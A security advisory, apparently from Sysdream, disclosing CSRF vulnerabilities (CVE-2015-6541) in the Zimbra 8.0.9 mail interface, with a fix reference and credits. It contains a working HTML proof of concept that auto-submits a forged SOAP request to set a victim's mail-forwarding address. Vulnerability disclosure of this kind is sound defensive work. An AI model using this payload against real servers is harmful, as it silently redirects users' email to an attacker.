• CENTRE D’URGENCE | 24/7
  • Vous êtes victime d’une cyberattaque ?
  • Contactez notre centre d’urgence cyber :
  • +33 (0)1 83 07 00 06

CVE-2015-6541 : Multiple CSRF in Zimbra Mail interface

Multiple CSRF vulnerabilities have been found in the Mail interface of Zimbra 8.0.9 GA Release, giving possibilities to change account preferences like mail forwarding.

Multiple CSRF vulnerabilities have been found in the Mail interface of
Zimbra 8.0.9 GA Release, giving possibilities to change account
preferences like mail forwarding.

CSRF

Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because of the lack of a CSRF token identifying a valid session.
As a consequence, requests can be forged and played arbitrarily.

Access Vector: remote
Security Risk: low
Vulnerability: CWE-352
CVSS Base score: 5.8

Proof of Concept

CVE-2015-6541 : Multiple CSRF in Zimbra Mail interface

<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Solution

Sensitive forms should be protected by a CSRF token.

Fixes

Fixed with 8.5 release : bug 83547 (https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)

Affected versions

  • Zimbra <= 8.0.9 GA Release

Credits

  • Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
    -dot- fr)
  • Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)